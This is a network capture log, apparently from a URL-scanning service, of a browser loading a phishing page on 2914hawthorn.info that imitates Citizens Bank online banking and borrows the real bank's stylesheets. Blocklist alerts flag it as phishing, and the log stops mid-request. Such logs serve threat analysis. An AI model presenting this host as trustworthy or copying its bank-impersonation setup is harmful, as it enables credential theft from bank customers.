x-amz-id-2: 0CjRecpRxiOwYsK21q4Rf2DZBadmoRKko9yraMQtB1DOIfy1DfJYzqusg8N70Gu24VR6uaBGnBk=
x-amz-request-id: XZ33XH8FZBZBDYDR
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 30 Sep 2022 20:51:31 GMT
age: 3381
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
etag: "6113f8408c59aebe188d6af273b90743"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 30 Sep 2022 21:47:52 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/ HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (28570), with CRLF line terminators
Size:   34309
Md5:    de863426ae80cf0784c7dfc86d12ef6f
Sha1:   afe91739c4632c06c90eb3866dba7e31bcd275db
Sha256: f16fd8ca8681124e566968b7ff506d55c829be5ee62f832f629263297a910679

Alerts:
  Blocklists:
    - openphish: RBS Citizens Bank
    - fortinet: Phishing
                                        
                                            GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-length: 6458
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fa9-500f"
last-modified: Mon, 04 May 2020 16:15:37 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 7617720
expires: Wed, 20 Sep 2023 21:47:53 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r5tGDCib%2BhmL93hyFhrb%2FkmsWG5Jpw%2FQpQ8vIGTrqWfuNW7E2dUtjWq%2BZKJdV%2FOCNaJQ%2FIU173CjWzX%2F0fAgFgrkBV5NMA7Adi%2BkFiJODi%2FBq3qHUR0P78%2Fm6ZlZ%2FWkm%2FvMnNOlm"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 753028d85cf10afe-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (20322)
Size:   6458
Md5:    df9fe6d48e380554eb0ec9687bed3246
Sha1:   207263d754220200c1916edfbda262f62223ecf5
Sha256: 91d57502b7260e6752c2b5f1636d77707929fa9f09da28589691e61816a448f9
                                        
                                            GET /ajax/libs/jquery.mask/1.14.10/jquery.mask.js HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.24.14
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-length: 4517
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03ec3-4e98"
last-modified: Mon, 04 May 2020 16:11:47 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 3289659
expires: Wed, 20 Sep 2023 21:47:53 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nOi7NN7pV%2Fv7RHTYWSEyoYp%2B71tNsJrGOAg9rSLLHeWNvhdgVH%2FpP1CeCe%2BItZqvCJp0st6F%2BHcANWtePvcBL6YBIWEXelPxIzhFkDm%2FfQIgGqWYjoFCb008TRlNtNRYP0twbO78"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 753028d86d71b512-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4517
Md5:    e40e054c5726f042bad463e3774a2777
Sha1:   5c9413b72837a440b327444104830c35ae3b052c
Sha256: fcc8a86d2e89e8fbe9815d50c23bf205191ab8a6c0bec67358cd975d94283ff8
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5931
Cache-Control: max-age=121933
Date: Fri, 30 Sep 2022 21:47:53 GMT
Etag: "6336862b-117"
Expires: Sun, 02 Oct 2022 07:40:06 GMT
Last-Modified: Fri, 30 Sep 2022 06:01:15 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /ajax/jQuery/jquery-3.3.1.min.js HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
content-type: application/javascript
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 17575968
cache-control: public,max-age=31536000
date: Fri, 30 Sep 2022 21:47:53 GMT
etag: "80288516b793d31:0"
last-modified: Mon, 22 Jan 2018 19:27:49 GMT
server: ECAcc (ska/F7A8)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 30394
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   30394
Md5:    a263be51483c81a54aa8c85104a93e55
Sha1:   555a54a73531c553bd2aede6abc25c128b63312e
Sha256: b2f13ad730928958c09d89e6e32bb6a227c0260d032a39ca464d998a59e57a66
                                        
                                            GET /jquery-3.3.1.slim.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://2914hawthorn.info
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-encoding: gzip
content-length: 24038
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-1111d"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664574473.dop219.sk1.t,1664574473.cds071.sk1.hn,1664574473.cds230.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65247)
Size:   24038
Md5:    0f2e7d37e730fdbb1d8a1e8638529ecb
Sha1:   c21d16978a858baa75be15cb7e799ff000929429
Sha256: cc938c08b93e67c94c68995709f52133c62cac78991f42058503b9c3d9e4b0b0
                                        
                                            GET /jquery-3.2.1.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         69.16.175.10
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Fri, 30 Sep 2022 21:47:53 GMT
content-encoding: gzip
content-length: 30125
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-15283"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664574473.dop208.sk1.t,1664574473.cds257.sk1.hn,1664574473.cds222.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32058)
Size:   30125
Md5:    148f8d3ffd9cc02048c5f4d1cc83c407
Sha1:   9f2b89cfd151be6a29b4d43ad64d164fb8471046
Sha256: 4dc681da48ba2b417e613e8e027ff5322963c3a3697a8ba97973cfefb48def5e
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/css/style.css HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Last-Modified: Sat, 11 Sep 2021 23:33:28 GMT
Accept-Ranges: bytes
Content-Length: 276
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   276
Md5:    cf8082d42827570555aa3c8247b357f1
Sha1:   7ebd45146e9d22f1c3c19d6e7e532ecf70b76327
Sha256: 279b0f0df4fc4c51d93071e759a7dc2210b085aa0f2c41f40247720fc2906e77
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "DBB26F155F5789FA5829012543A0960DF03167CDD1EAE5FB8A3AE110F6C7B340"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1588
Cache-Control: public, no-transform, must-revalidate, max-age=2983
Expires: Fri, 30 Sep 2022 22:37:36 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1588
Md5:    52ff3e3c910133c4bbe27c7cf1ae164f
Sha1:   deed1687f0c115816f5dc1f16718d1790a723fe5
Sha256: dbb26f155f5789fa5829012543a0960df03167cdd1eae5fb8a3ae110f6c7b340
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "DBB26F155F5789FA5829012543A0960DF03167CDD1EAE5FB8A3AE110F6C7B340"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1588
Cache-Control: public, no-transform, must-revalidate, max-age=2873
Expires: Fri, 30 Sep 2022 22:35:46 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1588
Md5:    52ff3e3c910133c4bbe27c7cf1ae164f
Sha1:   deed1687f0c115816f5dc1f16718d1790a723fe5
Sha256: dbb26f155f5789fa5829012543a0960df03167cdd1eae5fb8a3ae110f6c7b340
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5931
Cache-Control: max-age=121933
Date: Fri, 30 Sep 2022 21:47:53 GMT
Etag: "6336862b-117"
Expires: Sun, 02 Oct 2022 07:40:06 GMT
Last-Modified: Fri, 30 Sep 2022 06:01:15 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 279

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         18.165.201.80
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Expires, Backoff, ETag, Last-Modified, Pragma, Cache-Control, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
X-Content-Type-Options: nosniff
Date: Fri, 30 Sep 2022 21:32:55 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Fri, 30 Sep 2022 22:12:13 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 4ae6e5888b43b4133973ba1aadad8194.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: LHR50-P3
X-Amz-Cf-Id: 5Djxq7-uJXdSn3BsBaxhXXosqqOiJNFxY9M0iko1rL70ad9KP_K4ew==
Age: 900


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /citi/citizensbankonline.com_deathshortencode/W/js/actions.js HTTP/1.1 
Host: 2914hawthorn.info
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/citi/citizensbankonline.com_deathshortencode/W/
Cookie: PHPSESSID=faa12d036bbaa029941efe16476be2a1
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         69.49.244.31
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Fri, 30 Sep 2022 21:47:51 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2021 20:00:58 GMT
Accept-Ranges: bytes
Content-Length: 1294
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1294
Md5:    6224e21da3d6cf2f5de0debf15e42489
Sha1:   a97a3034a530ad6fa3c5967fe46648dbbeaa71c4
Sha256: 70e85a009826725354b61dda5e78f14418a117f6d4646550d2c55c499ec64a50

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3592
Expires: Fri, 30 Sep 2022 22:47:45 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3600
Expires: Fri, 30 Sep 2022 22:47:53 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.entrust.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 71
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.110.10.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
ETag: "7F05BFA8E5648EBEE1A47EAF3E38CBEEB0E19B18E10B4429536C6FC58AB16284"
Last-Modified: Fri, 30 Sep 2022 11:00:00 UTC
Content-Length: 1566
Cache-Control: public, no-transform, must-revalidate, max-age=3600
Expires: Fri, 30 Sep 2022 22:47:53 GMT
Date: Fri, 30 Sep 2022 21:47:53 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1566
Md5:    5a9c2cedf4fe49124887fb161141f8ee
Sha1:   2f61c5d0c38bcb6c06f1ece719fc79392e4212c2
Sha256: 7f05bfa8e5648ebee1a47eaf3e38cbeeb0e19b18e10b4429536c6fc58ab16284
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2951
Cache-Control: 'max-age=158059'
Date: Fri, 30 Sep 2022 21:47:53 GMT
Last-Modified: Fri, 30 Sep 2022 20:58:42 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /efs/efs/jsp-ns/inc/css/normalize.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "26c2-5e885b034be9a"
last-modified: Tue, 27 Sep 2022 20:00:17 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=489
x-olb-req-received: t=1664242473123773
content-length: 2300
cache-control: max-age=20055
expires: Sat, 01 Oct 2022 03:22:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   2300
Md5:    0a445a15e0f09a7738952731fdf3fe9d
Sha1:   3d4cef20189303cc4f24c27da1b8d2043e700cea
Sha256: 173f4f410b46ca6211eee490747009c597b7d7c475bcac07df88a18521bbef54
                                        
                                            GET /efs/efs/jsp-ns/inc/css/flows.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "21ce-5e885b034efbf"
last-modified: Tue, 27 Sep 2022 01:39:47 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=456
x-olb-req-received: t=1664242472984541
content-length: 1975
cache-control: max-age=44056
expires: Sat, 01 Oct 2022 10:02:09 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   1975
Md5:    07507f946ee4b2b9d4affc283b431119
Sha1:   00218cebeb305b00ae4ef74e4a67957d3c43e6f2
Sha256: 44fb4d44ce9291066e686a9861b8b31f021c816fa60e97c613bf5aadcc8e2830
                                        
                                            GET /efs/efs/jsp-ns/inc/css/main.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "f405-5e885b034ff5f"
last-modified: Tue, 27 Sep 2022 01:56:45 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=2179
x-olb-req-received: t=1664242473065180
content-length: 10382
cache-control: max-age=44055
expires: Sat, 01 Oct 2022 10:02:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   10382
Md5:    e8a5a242bcaea8c7314ccbb04612d922
Sha1:   101e2286a81e108dd00c618032d793b2dc5366b3
Sha256: 8e2a305132b87d2a48461f8e3d820dbf640d66d530ab007632c5c5d79ce8cdc7
                                        
                                            GET /efs/efs/jsp-ns/inc/css/ad-containers.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.110.3.220
HTTP/2 200 OK
content-type: text/css
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-encoding: br
etag: "1dd4-5e885b034ed75"
last-modified: Tue, 27 Sep 2022 02:26:36 GMT
server: Akamai Resource Optimizer
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-olb-req-duration: D=400
x-olb-req-received: t=1664242473687426
content-length: 1227
cache-control: max-age=44055
expires: Sat, 01 Oct 2022 10:02:08 GMT
date: Fri, 30 Sep 2022 21:47:53 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
strict-transport-security: max-age=15768000
lb-action: None, None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1227
Md5:    e9404d7ddc1ef0b93851879620bfea8a
Sha1:   69575dd0119d3439f3d7ba4b45d12a3c0e47a39e
Sha256: f5be5cfcdb9f541d6e355cd15b78204e715c979bb90a7dbae94d18c9bdad8772
                                        
                                            GET /efs/efs/jsp-ns/inc/css/jquery-ui-1.10.3.custom.min.css HTTP/1.1 
Host: www3.citizensbankonline.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Sec-Fetch-Dest: style
